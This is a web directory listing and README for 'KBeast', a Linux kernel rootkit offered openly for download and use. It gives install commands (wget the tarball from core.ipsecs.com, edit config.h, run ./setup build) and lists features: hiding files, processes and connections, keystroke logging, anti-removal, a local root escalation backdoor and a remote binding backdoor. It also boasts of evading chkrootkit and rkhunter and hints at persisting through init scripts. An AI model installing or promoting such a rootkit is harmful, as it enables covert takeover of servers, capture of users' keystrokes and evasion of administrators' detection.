Index of /rootkit/kernel-rootkit/kbeast-v1/

      Name                                                                             Last modified         Size  Description 
   
up Parent Directory 30-Mar-2012 04:22 - directory init 31-Dec-2011 17:32 - unknown LICENSE 01-Jan-2012 16:37 4k unknown Makefile 27-Dec-2011 04:38 4k [TXT] bd-ipsecs-kbeast-v1.c 28-Dec-2011 18:30 4k [TXT] config.h 27-Dec-2011 19:57 4k [TXT] ipsecs-kbeast-v1.c 01-Jan-2012 16:37 20k unknown ipsecs-kbeast-v1.cc1 27-Dec-2011 19:57 20k unknown setup 28-Dec-2011 18:30 8k

KBeast (Kernel Beast) is new kernel rootkit based on the publicly known rootkit, 
modification is made in order to support kernel 2.6.16, 2.6.18, 2.6.32, and 2.6.35. 
Actually it should work for kernel 2.6.18 up to 3.x.x or more, but our installer 
script is only created for 2.6.16, 2.6.18, 2.6.32, and 2.6.35. Below are quick 
step installing the beast:

    > wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
    > tar zxvf ipsecs-kbeast-v1.tar.gz
    > cd kbeast-v1/
    > modify config.h to meet your requirement, remember that _MAGIC_NAME_ 
      must be user with sh/bash shell
    > In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
    > In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build 
      (actually it should work for the recent kernel)
    > In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat() 
      related code, modify syscall table address manually, then execute ./setup build 0

Be kind to note that the beast has been tested in, but not limited to, kernel 2.6.9, 
2.6.16, 2.6.18, 2.6.32, 2.6.35 (i386 or x86_64). The feature of this rootkit are:

    > Hiding this loadable kernel module
    > Hiding files/directory
    > Hiding process (ps, pstree, top, lsof)
    > Hiding socket and connections (netstat, lsof)
    > Keystroke logging to capture user activity
    > Anti-kill process
    > Anti-remove files
    > Anti-delete this loadable kernel modules
    > Local root escalation backdoor
    > Remote binding backdoor hidden by the kernel rootkit

During my test with chkrootkit and rkhunter, this rootkit wasn’t detected by 
those rootkit hunter. The limitation of my rootkit, you have to think yourself how to 
load the rootkit when the server rebooted. Believe me that is easy task, please see 
modification of init script here as example. Finally, you can download the kernel 
beast on core.ipsecs.com.

See Nightmare for Linux System Administrator, and Happy New Year 2012!
Proudly Served by LiteSpeed Web Server at core.ipsecs.com Port 80